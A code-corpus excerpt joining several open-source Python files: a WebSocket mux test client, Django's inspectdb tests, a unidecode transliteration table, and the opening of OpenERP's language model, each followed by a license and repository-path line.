payload = self._mux._incoming_frame_filter.filter(payload)
pending_payload.append(payload)
if fin:
break
if self._stop_requested:
return None, None
message = ''.join(pending_payload)
return first_opcode, message
def request_stop(self):
self._stop_requested = True
def run(self):
try:
while not self._stop_requested:
# opcode is OPCODE_BINARY or control opcodes when a message
# is succesfully received.
opcode, message = self._receive_message()
if not opcode:
return
if opcode == client_for_testing.OPCODE_BINARY:
channel_id, advance = _parse_channel_id(message)
self._mux._dispatch_frame(channel_id, message[advance:])
else:
self._mux._process_control_message(opcode, message)
finally:
self._mux._notify_reader_done()
class _InnerFrame(object):
def __init__(self, fin, rsv1, rsv2, rsv3, opcode, payload):
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.payload = payload
class _LogicalChannelData(object):
def __init__(self):
self.queue = Queue.Queue()
self.send_quota = 0
self.receive_quota = 0
class MuxClient(object):
"""WebSocket mux client.
Note that this class is NOT thread-safe. Do not access an instance of this
class from multiple threads at a same time.
"""
def __init__(self, options):
self._logger = util.get_class_logger(self)
self._options = options
self._options.enable_mux()
self._stream = None
self._socket = None
self._handshake = client_for_testing.WebSocketHandshake(self._options)
self._incoming_frame_filter = None
self._outgoing_frame_filter = None
self._is_active = False
self._read_thread = None
self._control_blocks_condition = threading.Condition()
self._control_blocks = []
self._channel_slots = collections.deque()
self._logical_channels_condition = threading.Condition();
self._logical_channels = {}
self._timeout = 2
self._physical_connection_close_event = None
self._physical_connection_close_message = None
def _parse_inner_frame(self, data):
if len(data) == 0:
raise Exception('Invalid encapsulated frame received')
first_byte = ord(data[0])
fin = (first_byte << 7) & 1
rsv1 = (first_byte << 6) & 1
rsv2 = (first_byte << 5) & 1
rsv3 = (first_byte << 4) & 1
opcode = first_byte & 0xf
if self._outgoing_frame_filter:
payload = self._outgoing_frame_filter.filter(
data[1:])
else:
payload = data[1:]
return _InnerFrame(fin, rsv1, rsv2, rsv3, opcode, payload)
def _process_mux_control_blocks(self):
for block in self._control_blocks:
if block.opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
# AddChannelResponse will be handled in add_channel().
continue
elif block.opcode == _MUX_OPCODE_FLOW_CONTROL:
try:
self._logical_channels_condition.acquire()
if not block.channel_id in self._logical_channels:
raise Exception('Invalid flow control received for '
'channel id %d' % block.channel_id)
self._logical_channels[block.channel_id].send_quota += (
block.send_quota)
self._logical_channels_condition.notify()
finally:
self._logical_channels_condition.release()
elif block.opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
self._channel_slots.extend([block.send_quota] * block.slots)
def _dispatch_frame(self, channel_id, payload):
if channel_id == _CONTROL_CHANNEL_ID:
try:
self._control_blocks_condition.acquire()
self._control_blocks += _parse_control_blocks(payload)
self._process_mux_control_blocks()
self._control_blocks_condition.notify()
finally:
self._control_blocks_condition.release()
else:
try:
self._logical_channels_condition.acquire()
if not channel_id in self._logical_channels:
raise Exception('Received logical frame on channel id '
'%d, which is not established' %
channel_id)
inner_frame = self._parse_inner_frame(payload)
self._logical_channels[channel_id].receive_quota -= (
len(inner_frame.payload))
if self._logical_channels[channel_id].receive_quota < 0:
raise Exception('The server violates quota on '
'channel id %d' % channel_id)
finally:
self._logical_channels_condition.release()
self._logical_channels[channel_id].queue.put(inner_frame)
def _process_control_message(self, opcode, message):
# Ping/Pong are not supported.
if opcode == client_for_testing.OPCODE_CLOSE:
self._physical_connection_close_message = message
if self._is_active:
self._stream.send_close(
code=client_for_testing.STATUS_NORMAL_CLOSURE, reason='')
self._read_thread.request_stop()
if self._physical_connection_close_event:
self._physical_connection_close_event.set()
def _notify_reader_done(self):
self._logger.debug('Read thread terminated.')
self.close_socket()
def _assert_channel_slot_available(self):
try:
self._control_blocks_condition.acquire()
if len(self._channel_slots) == 0:
# Wait once
self._control_blocks_condition.wait(timeout=self._timeout)
finally:
self._control_blocks_condition.release()
if len(self._channel_slots) == 0:
raise Exception('Failed to receive NewChannelSlot')
def _assert_send_quota_available(self, channel_id):
try:
self._logical_channels_condition.acquire()
if self._logical_channels[channel_id].send_quota == 0:
# Wait once
self._logical_channels_condition.wait(timeout=self._timeout)
finally:
self._logical_channels_condition.release()
if self._logical_channels[channel_id].send_quota == 0:
raise Exception('Failed to receive FlowControl for channel id %d' %
channel_id)
def connect(self):
self._socket = client_for_testing.connect_socket_with_retry(
self._options.server_host,
self._options.server_port,
self._options.socket_timeout,
self._options.use_tls)
self._handshake.handshake(self._socket)
self._stream = client_for_testing.WebSocketStream(
self._socket, self._handshake)
self._logical_channels[_DEFAULT_CHANNEL_ID] = _LogicalChannelData()
self._read_thread = _MuxReaderThread(self)
self._read_thread.start()
self._assert_channel_slot_available()
self._assert_send_quota_available(_DEFAULT_CHANNEL_ID)
self._is_active = True
self._logger.info('Connection established')
def add_channel(self, channel_id, options):
if not self._is_active:
raise Exception('Mux client is not active')
if channel_id in self._logical_channels:
raise Exception('Channel id %d already exists' % channel_id)
try:
send_quota = self._channel_slots.popleft()
except IndexError, e:
raise Exception('No channel slots: %r' % e)
# Create AddChannel request
request_line = 'GET %s HTTP/1.1\r\n' % options.resource
fields = []
if options.server_port == client_for_testing.DEFAULT_PORT:
fields.append('Host: %s\r\n' % options.server_host.lower())
else:
fields.append('Host: %s:%d\r\n' % (options.server_host.lower(),
options.server_port))
fields.append('Origin: %s\r\n' % options.origin.lower())
fields.append('Connection: Upgrade\r\n')
if len(options.extensions) > 0:
fields.append('Sec-WebSocket-Extensions: %s\r\n' %
', '.join(options.extensions))
handshake = request_line + ''.join(fields) + '\r\n'
add_channel_request = _create_add_channel_request(
channel_id, handshake)
payload = _encode_channel_id(_CONTROL_CHANNEL_ID) + add_channel_request
self._stream.send_binary(payload)
# Wait AddChannelResponse
self._logger.debug('Waiting AddChannelResponse for the request...')
response = None
try:
self._control_blocks_condition.acquire()
while True:
for block in self._control_blocks:
if block.opcode != _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
continue
if block.channel_id == channel_id:
response = block
self._control_blocks.remove(response)
break
if response:
break
self._control_blocks_condition.wait(self._timeout)
if not self._is_active:
raise Exception('AddChannelRequest timed out')
finally:
self._control_blocks_condition.release()
# Validate AddChannelResponse
if response.rejected:
raise Exception('The server rejected AddChannelRequest')
fields = _parse_handshake_response(response.encoded_handshake)
# Should we reject when Upgrade, Connection, or Sec-WebSocket-Accept
# headers exist?
self._logical_channels_condition.acquire()
self._logical_channels[channel_id] = _LogicalChannelData()
self._logical_channels[channel_id].send_quota = send_quota
self._logical_channels_condition.release()
self._logger.debug('Logical channel %d established' % channel_id)
def _check_logical_channel_is_opened(self, channel_id):
if not self._is_active:
raise Exception('Mux client is not active')
if not channel_id in self._logical_channels:
raise Exception('Logical channel %d is not established.')
def drop_channel(self, channel_id):
# TODO(bashi): Implement
pass
def send_flow_control(self, channel_id, replenished_quota):
self._check_logical_channel_is_opened(channel_id)
flow_control = _create_flow_control(channel_id, replenished_quota)
payload = _encode_channel_id(_CONTROL_CHANNEL_ID) + flow_control
# Replenish receive quota
try:
self._logical_channels_condition.acquire()
self._logical_channels[channel_id].receive_quota += (
replenished_quota)
finally:
self._logical_channels_condition.release()
self._stream.send_binary(payload)
def send_message(self, channel_id, message, end=True, binary=False):
self._check_logical_channel_is_opened(channel_id)
if binary:
first_byte = (end << 7) | client_for_testing.OPCODE_BINARY
else:
first_byte = (end << 7) | client_for_testing.OPCODE_TEXT
message = message.encode('utf-8')
try:
self._logical_channels_condition.acquire()
if self._logical_channels[channel_id].send_quota < len(message):
raise Exception('Send quota violation: %d < %d' % (
self._logical_channels[channel_id].send_quota,
len(message)))
self._logical_channels[channel_id].send_quota -= len(message)
finally:
self._logical_channels_condition.release()
payload = _encode_channel_id(channel_id) + chr(first_byte) + message
self._stream.send_binary(payload)
def assert_receive(self, channel_id, payload, binary=False):
self._check_logical_channel_is_opened(channel_id)
try:
inner_frame = self._logical_channels[channel_id].queue.get(
timeout=self._timeout)
except Queue.Empty, e:
raise Exception('Cannot receive message from channel id %d' %
channel_id)
if binary:
opcode = client_for_testing.OPCODE_BINARY
else:
opcode = client_for_testing.OPCODE_TEXT
if inner_frame.opcode != opcode:
raise Exception('Unexpected opcode received (%r != %r)' %
(expected_opcode, inner_frame.opcode))
if inner_frame.payload != payload:
raise Exception('Unexpected payload received')
def send_close(self, channel_id, code=None, reason=''):
self._check_logical_channel_is_opened(channel_id)
if code is not None:
body = struct.pack('!H', code) + reason.encode('utf-8')
else:
body = ''
first_byte = (1 << 7) | client_for_testing.OPCODE_CLOSE
payload = _encode_channel_id(channel_id) + chr(first_byte) + body
self._stream.send_binary(payload)
def assert_receive_close(self, channel_id):
self._check_logical_channel_is_opened(channel_id)
try:
inner_frame = self._logical_channels[channel_id].queue.get(
timeout=self._timeout)
except Queue.Empty, e:
raise Exception('Cannot receive message from channel id %d' %
channel_id)
if inner_frame.opcode != client_for_testing.OPCODE_CLOSE:
raise Exception('Didn\'t receive close frame')
def send_physical_connection_close(self, code=None, reason=''):
self._physical_connection_close_event = threading.Event()
self._stream.send_close(code, reason)
# This method can be used only after calling
# send_physical_connection_close().
def assert_physical_connection_receive_close(
self, code=client_for_testing.STATUS_NORMAL_CLOSURE, reason=''):
self._physical_connection_close_event.wait(timeout=self._timeout)
if (not self._physical_connection_close_event.isSet() or
not self._physical_connection_close_message):
raise Exception('Didn\'t receive closing handshake')
def close_socket(self):
self._is_active = False
self._socket.close()
| mpl-2.0 |
shaistaansari/django | tests/inspectdb/tests.py | 89 | 12808 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import re
from unittest import skipUnless
from django.core.management import call_command
from django.db import connection
from django.test import TestCase, skipUnlessDBFeature
from django.utils.six import PY3, StringIO
from .models import ColumnTypes
class InspectDBTestCase(TestCase):
def test_stealth_table_name_filter_option(self):
out = StringIO()
# Lets limit the introspection to tables created for models of this
# application
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_'),
stdout=out)
error_message = "inspectdb has examined a table that should have been filtered out."
# contrib.contenttypes is one of the apps always installed when running
# the Django test suite, check that one of its tables hasn't been
# inspected
self.assertNotIn("class DjangoContentType(models.Model):", out.getvalue(), msg=error_message)
def make_field_type_asserter(self):
"""Call inspectdb and return a function to validate a field type in its output"""
out = StringIO()
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_columntypes'),
stdout=out)
output = out.getvalue()
def assertFieldType(name, definition):
out_def = re.search(r'^\s*%s = (models.*)$' % name, output, re.MULTILINE).groups()[0]
self.assertEqual(definition, out_def)
return assertFieldType
def test_field_types(self):
"""Test introspection of various Django field types"""
assertFieldType = self.make_field_type_asserter()
# Inspecting Oracle DB doesn't produce correct results (#19884):
# - it gets max_length wrong: it returns a number of bytes.
# - it reports fields as blank=True when they aren't.
if (connection.features.can_introspect_max_length and
not connection.features.interprets_empty_strings_as_nulls):
assertFieldType('char_field', "models.CharField(max_length=10)")
assertFieldType('null_char_field', "models.CharField(max_length=10, blank=True, null=True)")
assertFieldType('comma_separated_int_field', "models.CharField(max_length=99)")
assertFieldType('date_field', "models.DateField()")
assertFieldType('date_time_field', "models.DateTimeField()")
if (connection.features.can_introspect_max_length and
not connection.features.interprets_empty_strings_as_nulls):
assertFieldType('email_field', "models.CharField(max_length=254)")
assertFieldType('file_field', "models.CharField(max_length=100)")
assertFieldType('file_path_field', "models.CharField(max_length=100)")
if connection.features.can_introspect_ip_address_field:
assertFieldType('gen_ip_adress_field', "models.GenericIPAddressField()")
elif (connection.features.can_introspect_max_length and
not connection.features.interprets_empty_strings_as_nulls):
assertFieldType('gen_ip_adress_field', "models.CharField(max_length=39)")
if (connection.features.can_introspect_max_length and
not connection.features.interprets_empty_strings_as_nulls):
assertFieldType('slug_field', "models.CharField(max_length=50)")
if not connection.features.interprets_empty_strings_as_nulls:
assertFieldType('text_field', "models.TextField()")
if connection.features.can_introspect_time_field:
assertFieldType('time_field', "models.TimeField()")
if (connection.features.can_introspect_max_length and
not connection.features.interprets_empty_strings_as_nulls):
assertFieldType('url_field', "models.CharField(max_length=200)")
def test_number_field_types(self):
"""Test introspection of various Django field types"""
assertFieldType = self.make_field_type_asserter()
if not connection.features.can_introspect_autofield:
assertFieldType('id', "models.IntegerField(primary_key=True) # AutoField?")
if connection.features.can_introspect_big_integer_field:
assertFieldType('big_int_field', "models.BigIntegerField()")
else:
assertFieldType('big_int_field', "models.IntegerField()")
bool_field = ColumnTypes._meta.get_field('bool_field')
bool_field_type = connection.features.introspected_boolean_field_type(bool_field)
assertFieldType('bool_field', "models.{}()".format(bool_field_type))
null_bool_field = ColumnTypes._meta.get_field('null_bool_field')
null_bool_field_type = connection.features.introspected_boolean_field_type(null_bool_field)
if 'BooleanField' in null_bool_field_type:
assertFieldType('null_bool_field', "models.{}()".format(null_bool_field_type))
else:
if connection.features.can_introspect_null:
assertFieldType('null_bool_field', "models.{}(blank=True, null=True)".format(null_bool_field_type))
else:
assertFieldType('null_bool_field', "models.{}()".format(null_bool_field_type))
if connection.features.can_introspect_decimal_field:
assertFieldType('decimal_field', "models.DecimalField(max_digits=6, decimal_places=1)")
else: # Guessed arguments on SQLite, see #5014
assertFieldType('decimal_field', "models.DecimalField(max_digits=10, decimal_places=5) "
"# max_digits and decimal_places have been guessed, "
"as this database handles decimal fields as float")
assertFieldType('float_field', "models.FloatField()")
assertFieldType('int_field', "models.IntegerField()")
if connection.features.can_introspect_positive_integer_field:
assertFieldType('pos_int_field', "models.PositiveIntegerField()")
else:
assertFieldType('pos_int_field', "models.IntegerField()")
if connection.features.can_introspect_positive_integer_field:
if connection.features.can_introspect_small_integer_field:
assertFieldType('pos_small_int_field', "models.PositiveSmallIntegerField()")
else:
assertFieldType('pos_small_int_field', "models.PositiveIntegerField()")
else:
if connection.features.can_introspect_small_integer_field:
assertFieldType('pos_small_int_field', "models.SmallIntegerField()")
else:
assertFieldType('pos_small_int_field', "models.IntegerField()")
if connection.features.can_introspect_small_integer_field:
assertFieldType('small_int_field', "models.SmallIntegerField()")
else:
assertFieldType('small_int_field', "models.IntegerField()")
@skipUnlessDBFeature('can_introspect_foreign_keys')
def test_attribute_name_not_python_keyword(self):
out = StringIO()
# Lets limit the introspection to tables created for models of this
# application
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_'),
stdout=out)
output = out.getvalue()
error_message = "inspectdb generated an attribute name which is a python keyword"
# Recursive foreign keys should be set to 'self'
self.assertIn("parent = models.ForeignKey('self')", output)
self.assertNotIn("from = models.ForeignKey(InspectdbPeople)", output, msg=error_message)
# As InspectdbPeople model is defined after InspectdbMessage, it should be quoted
self.assertIn("from_field = models.ForeignKey('InspectdbPeople', db_column='from_id')",
output)
self.assertIn("people_pk = models.ForeignKey(InspectdbPeople, primary_key=True)",
output)
self.assertIn("people_unique = models.ForeignKey(InspectdbPeople, unique=True)",
output)
def test_digits_column_name_introspection(self):
"""Introspection of column names consist/start with digits (#16536/#17676)"""
out = StringIO()
# Lets limit the introspection to tables created for models of this
# application
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_'),
stdout=out)
output = out.getvalue()
error_message = "inspectdb generated a model field name which is a number"
self.assertNotIn(" 123 = models.CharField", output, msg=error_message)
self.assertIn("number_123 = models.CharField", output)
error_message = "inspectdb generated a model field name which starts with a digit"
self.assertNotIn(" 4extra = models.CharField", output, msg=error_message)
self.assertIn("number_4extra = models.CharField", output)
self.assertNotIn(" 45extra = models.CharField", output, msg=error_message)
self.assertIn("number_45extra = models.CharField", output)
def test_special_column_name_introspection(self):
"""
Introspection of column names containing special characters,
unsuitable for Python identifiers
"""
out = StringIO()
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_'),
stdout=out)
output = out.getvalue()
base_name = 'Field' if not connection.features.uppercases_column_names else 'field'
self.assertIn("field = models.IntegerField()", output)
self.assertIn("field_field = models.IntegerField(db_column='%s_')" % base_name, output)
self.assertIn("field_field_0 = models.IntegerField(db_column='%s__')" % base_name, output)
self.assertIn("field_field_1 = models.IntegerField(db_column='__field')", output)
self.assertIn("prc_x = models.IntegerField(db_column='prc(%) x')", output)
if PY3:
# Python 3 allows non-ASCII identifiers
self.assertIn("tamaño = models.IntegerField()", output)
else:
self.assertIn("tama_o = models.IntegerField(db_column='tama\\xf1o')", output)
def test_table_name_introspection(self):
"""
Introspection of table names containing special characters,
unsuitable for Python identifiers
"""
out = StringIO()
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_'),
stdout=out)
output = out.getvalue()
self.assertIn("class InspectdbSpecialTableName(models.Model):", output)
def test_managed_models(self):
"""Test that by default the command generates models with `Meta.managed = False` (#14305)"""
out = StringIO()
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_columntypes'),
stdout=out)
output = out.getvalue()
self.longMessage = False
self.assertIn(" managed = False", output, msg='inspectdb should generate unmanaged models.')
def test_unique_together_meta(self):
out = StringIO()
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_uniquetogether'),
stdout=out)
output = out.getvalue()
self.assertIn(" unique_together = (('field1', 'field2'),)", output, msg='inspectdb should generate unique_together.')
@skipUnless(connection.vendor == 'sqlite',
"Only patched sqlite's DatabaseIntrospection.data_types_reverse for this test")
def test_custom_fields(self):
"""
Introspection of columns with a custom field (#21090)
"""
out = StringIO()
orig_data_types_reverse = connection.introspection.data_types_reverse
try:
connection.introspection.data_types_reverse = {
'text': 'myfields.TextField',
'bigint': 'BigIntegerField',
}
call_command('inspectdb',
table_name_filter=lambda tn: tn.startswith('inspectdb_columntypes'),
stdout=out)
output = out.getvalue()
self.assertIn("text_field = myfields.TextField()", output)
self.assertIn("big_int_field = models.BigIntegerField()", output)
finally:
connection.introspection.data_types_reverse = orig_data_types_reverse
| bsd-3-clause |
grantsewell/nzbToMedia | libs/unidecode/x099.py | 252 | 4629 | data = (
'Hai ', # 0x00
'Ren ', # 0x01
'Tian ', # 0x02
'Jiao ', # 0x03
'Jia ', # 0x04
'Bing ', # 0x05
'Yao ', # 0x06
'Tong ', # 0x07
'Ci ', # 0x08
'Xiang ', # 0x09
'Yang ', # 0x0a
'Yang ', # 0x0b
'Er ', # 0x0c
'Yan ', # 0x0d
'Le ', # 0x0e
'Yi ', # 0x0f
'Can ', # 0x10
'Bo ', # 0x11
'Nei ', # 0x12
'E ', # 0x13
'Bu ', # 0x14
'Jun ', # 0x15
'Dou ', # 0x16
'Su ', # 0x17
'Yu ', # 0x18
'Shi ', # 0x19
'Yao ', # 0x1a
'Hun ', # 0x1b
'Guo ', # 0x1c
'Shi ', # 0x1d
'Jian ', # 0x1e
'Zhui ', # 0x1f
'Bing ', # 0x20
'Xian ', # 0x21
'Bu ', # 0x22
'Ye ', # 0x23
'Tan ', # 0x24
'Fei ', # 0x25
'Zhang ', # 0x26
'Wei ', # 0x27
'Guan ', # 0x28
'E ', # 0x29
'Nuan ', # 0x2a
'Hun ', # 0x2b
'Hu ', # 0x2c
'Huang ', # 0x2d
'Tie ', # 0x2e
'Hui ', # 0x2f
'Jian ', # 0x30
'Hou ', # 0x31
'He ', # 0x32
'Xing ', # 0x33
'Fen ', # 0x34
'Wei ', # 0x35
'Gu ', # 0x36
'Cha ', # 0x37
'Song ', # 0x38
'Tang ', # 0x39
'Bo ', # 0x3a
'Gao ', # 0x3b
'Xi ', # 0x3c
'Kui ', # 0x3d
'Liu ', # 0x3e
'Sou ', # 0x3f
'Tao ', # 0x40
'Ye ', # 0x41
'Yun ', # 0x42
'Mo ', # 0x43
'Tang ', # 0x44
'Man ', # 0x45
'Bi ', # 0x46
'Yu ', # 0x47
'Xiu ', # 0x48
'Jin ', # 0x49
'San ', # 0x4a
'Kui ', # 0x4b
'Zhuan ', # 0x4c
'Shan ', # 0x4d
'Chi ', # 0x4e
'Dan ', # 0x4f
'Yi ', # 0x50
'Ji ', # 0x51
'Rao ', # 0x52
'Cheng ', # 0x53
'Yong ', # 0x54
'Tao ', # 0x55
'Hui ', # 0x56
'Xiang ', # 0x57
'Zhan ', # 0x58
'Fen ', # 0x59
'Hai ', # 0x5a
'Meng ', # 0x5b
'Yan ', # 0x5c
'Mo ', # 0x5d
'Chan ', # 0x5e
'Xiang ', # 0x5f
'Luo ', # 0x60
'Zuan ', # 0x61
'Nang ', # 0x62
'Shi ', # 0x63
'Ding ', # 0x64
'Ji ', # 0x65
'Tuo ', # 0x66
'Xing ', # 0x67
'Tun ', # 0x68
'Xi ', # 0x69
'Ren ', # 0x6a
'Yu ', # 0x6b
'Chi ', # 0x6c
'Fan ', # 0x6d
'Yin ', # 0x6e
'Jian ', # 0x6f
'Shi ', # 0x70
'Bao ', # 0x71
'Si ', # 0x72
'Duo ', # 0x73
'Yi ', # 0x74
'Er ', # 0x75
'Rao ', # 0x76
'Xiang ', # 0x77
'Jia ', # 0x78
'Le ', # 0x79
'Jiao ', # 0x7a
'Yi ', # 0x7b
'Bing ', # 0x7c
'Bo ', # 0x7d
'Dou ', # 0x7e
'E ', # 0x7f
'Yu ', # 0x80
'Nei ', # 0x81
'Jun ', # 0x82
'Guo ', # 0x83
'Hun ', # 0x84
'Xian ', # 0x85
'Guan ', # 0x86
'Cha ', # 0x87
'Kui ', # 0x88
'Gu ', # 0x89
'Sou ', # 0x8a
'Chan ', # 0x8b
'Ye ', # 0x8c
'Mo ', # 0x8d
'Bo ', # 0x8e
'Liu ', # 0x8f
'Xiu ', # 0x90
'Jin ', # 0x91
'Man ', # 0x92
'San ', # 0x93
'Zhuan ', # 0x94
'Nang ', # 0x95
'Shou ', # 0x96
'Kui ', # 0x97
'Guo ', # 0x98
'Xiang ', # 0x99
'Fen ', # 0x9a
'Ba ', # 0x9b
'Ni ', # 0x9c
'Bi ', # 0x9d
'Bo ', # 0x9e
'Tu ', # 0x9f
'Han ', # 0xa0
'Fei ', # 0xa1
'Jian ', # 0xa2
'An ', # 0xa3
'Ai ', # 0xa4
'Fu ', # 0xa5
'Xian ', # 0xa6
'Wen ', # 0xa7
'Xin ', # 0xa8
'Fen ', # 0xa9
'Bin ', # 0xaa
'Xing ', # 0xab
'Ma ', # 0xac
'Yu ', # 0xad
'Feng ', # 0xae
'Han ', # 0xaf
'Di ', # 0xb0
'Tuo ', # 0xb1
'Tuo ', # 0xb2
'Chi ', # 0xb3
'Xun ', # 0xb4
'Zhu ', # 0xb5
'Zhi ', # 0xb6
'Pei ', # 0xb7
'Xin ', # 0xb8
'Ri ', # 0xb9
'Sa ', # 0xba
'Yin ', # 0xbb
'Wen ', # 0xbc
'Zhi ', # 0xbd
'Dan ', # 0xbe
'Lu ', # 0xbf
'You ', # 0xc0
'Bo ', # 0xc1
'Bao ', # 0xc2
'Kuai ', # 0xc3
'Tuo ', # 0xc4
'Yi ', # 0xc5
'Qu ', # 0xc6
'[?] ', # 0xc7
'Qu ', # 0xc8
'Jiong ', # 0xc9
'Bo ', # 0xca
'Zhao ', # 0xcb
'Yuan ', # 0xcc
'Peng ', # 0xcd
'Zhou ', # 0xce
'Ju ', # 0xcf
'Zhu ', # 0xd0
'Nu ', # 0xd1
'Ju ', # 0xd2
'Pi ', # 0xd3
'Zang ', # 0xd4
'Jia ', # 0xd5
'Ling ', # 0xd6
'Zhen ', # 0xd7
'Tai ', # 0xd8
'Fu ', # 0xd9
'Yang ', # 0xda
'Shi ', # 0xdb
'Bi ', # 0xdc
'Tuo ', # 0xdd
'Tuo ', # 0xde
'Si ', # 0xdf
'Liu ', # 0xe0
'Ma ', # 0xe1
'Pian ', # 0xe2
'Tao ', # 0xe3
'Zhi ', # 0xe4
'Rong ', # 0xe5
'Teng ', # 0xe6
'Dong ', # 0xe7
'Xun ', # 0xe8
'Quan ', # 0xe9
'Shen ', # 0xea
'Jiong ', # 0xeb
'Er ', # 0xec
'Hai ', # 0xed
'Bo ', # 0xee
'Zhu ', # 0xef
'Yin ', # 0xf0
'Luo ', # 0xf1
'Shuu ', # 0xf2
'Dan ', # 0xf3
'Xie ', # 0xf4
'Liu ', # 0xf5
'Ju ', # 0xf6
'Song ', # 0xf7
'Qin ', # 0xf8
'Mang ', # 0xf9
'Liang ', # 0xfa
'Han ', # 0xfb
'Tu ', # 0xfc
'Xuan ', # 0xfd
'Tui ', # 0xfe
'Jun ', # 0xff
)
| gpl-3.0 |
OSSESAC/odoopubarquiluz | openerp/addons/base/res/res_lang.py | 34 | 14785 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import locale
from locale import localeconv
import logging
import re
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class lang(osv.osv):
_name = "res.lang"
_description = "Languages"
_disallowed_datetime_patterns = tools.DATETIME_FORMATS_MAP.keys()
_disallowed_datetime_patterns.remove('%y') # this one is in fact allowed, just not good practice
def install_lang(self, cr, uid, **args):
"""
This method is called from openerp/addons/base/base_data.xml to load
some language and set it as the default for every partners. The
language is set via tools.config by the RPC 'create' method on the
'db' object. This is a fragile solution and something else should be
found.
"""
lang = tools.config.get('lang')
if not lang:
return False
lang_ids = self.search(cr, uid, [('code','=', lang)])
if not lang_ids:
self.load_lang(cr, uid, lang)
ir_values_obj = self.pool.get('ir.values')
default_value = ir_values_obj.get(cr, uid, 'default', False, ['res.partner'])
if not default_value:
ir_values_obj.set(cr, uid, 'default', False, 'lang', ['res.partner'], lang)
return True
def load_lang(self, cr, uid, lang, lang_name=None):
# create the language with locale information
fail = True
iso_lang = tools.get_iso_codes(lang)
for ln in tools.get_locales(lang):
try:
locale.setlocale(locale.LC_ALL, str(ln))
fail = False
break
except locale.Error:
continue
if fail:
lc = locale.getdefaultlocale()[0]
msg = 'Unable to get information for locale %s. Information from the default locale (%s) have been used.'
_logger.warning(msg, lang, lc)
if not lang_name:
lang_name = tools.ALL_LANGUAGES.get(lang, lang)
def fix_xa0(s):
"""Fix badly-encoded non-breaking space Unicode character from locale.localeconv(),
coercing to utf-8, as some platform seem to output localeconv() in their system
encoding, e.g. Windows-1252"""
if s == '\xa0':
return '\xc2\xa0'
return s
def fix_datetime_format(format):
"""Python's strftime supports only the format directives
that are available on the platform's libc, so in order to
be 100% cross-platform we map to the directives required by
the C standard (1989 version), always available on platforms
with a C standard implementation."""
for pattern, replacement in tools.DATETIME_FORMATS_MAP.iteritems():
format = format.replace(pattern, replacement)
return str(format)
lang_info = {
'code': lang,
'iso_code': iso_lang,
'name': lang_name,
'translatable': 1,
'date_format' : fix_datetime_format(locale.nl_langinfo(locale.D_FMT)),
'time_format' : fix_datetime_format(locale.nl_langinfo(locale.T_FMT)),
'decimal_point' : fix_xa0(str(locale.localeconv()['decimal_point'])),
'thousands_sep' : fix_xa0(str(locale.localeconv()['thousands_sep'])),
}
lang_id = False
try:
lang_id = self.create(cr, uid, lang_info)
finally:
tools.resetlocale()
return lang_id
def _check_format(self, cr, uid, ids, context=None):
for lang in self.browse(cr, uid, ids, context=context):
for pattern in self._disallowed_datetime_patterns:
if (lang.time_format and pattern in lang.time_format)\
or (lang.date_format and pattern in lang.date_format):
return False
return True
def _get_default_date_format(self, cursor, user, context=None):
return '%m/%d/%Y'
def _get_default_time_format(self, cursor, user, context=None):
return '%H:%M:%S'
_columns = {
'name': fields.char('Name', size=64, required=True),
'code': fields.char('Locale Code', size=16, required=True, help='This field is used to set/get locales for user'),
'iso_code': fields.char('ISO code', size=16, required=False, help='This ISO code is the name of po files to use for translations'),
'translatable': fields.boolean('Translatable'),
'active': fields.boolean('Active'),
'direction': fields.selection([('ltr', 'Left-to-Right'), ('rtl', 'Right-to-Left')], 'Direction',required=True),
'date_format':fields.char('Date Format',size=64,required=True),
'time_format':fields.char('Time Format',size=64,required=True),
'grouping':fields.char('Separator Format',size=64,required=True,help="The Separator Format should be like [,n] where 0 < n :starting from Unit digit.-1 will end the separation. e.g. [3,2,-1] will represent 106500 to be 1,06,500;[1,2,-1] will represent it to be 106,50,0;[3] will represent it as 106,500. Provided ',' as the thousand separator in each case."),
'decimal_point':fields.char('Decimal Separator', size=64,required=True),
'thousands_sep':fields.char('Thousands Separator',size=64),
}
_defaults = {
'active': 1,
'translatable': 0,
'direction': 'ltr',
'date_format':_get_default_date_format,
'time_format':_get_default_time_format,
'grouping': '[]',
'decimal_point': '.',
'thousands_sep': ',',
}
_sql_constraints = [
('name_uniq', 'unique (name)', 'The name of the language must be unique !'),
('code_uniq', 'unique (code)', 'The code of the language must be unique !'),
]
_constraints = [
(_check_format, 'Invalid date/time format directive specified. Please refer to the list of allowed directives, displayed when you edit a language.', ['time_format', 'date_format'])
]
@tools.ormcache(skiparg=3)
def _lang_data_get(self, cr, uid, lang_id, monetary=False):
conv = localeconv()
lang_obj = self.browse(cr, uid, lang_id)
thousands_sep = lang_obj.thousands_sep or conv[monetary and 'mon_thousands_sep' or 'thousands_sep']
decimal_point = lang_obj.decimal_point
grouping = lang_obj.grouping
return grouping, thousands_sep, decimal_point
def write(self, cr, uid, ids, vals, context=None):
for lang_id in ids :
self._lang_data_get.clear_cache(self)
return super(lang, self).write(cr, uid, ids, vals, context)
def unlink(self, cr, uid, ids, context=None):
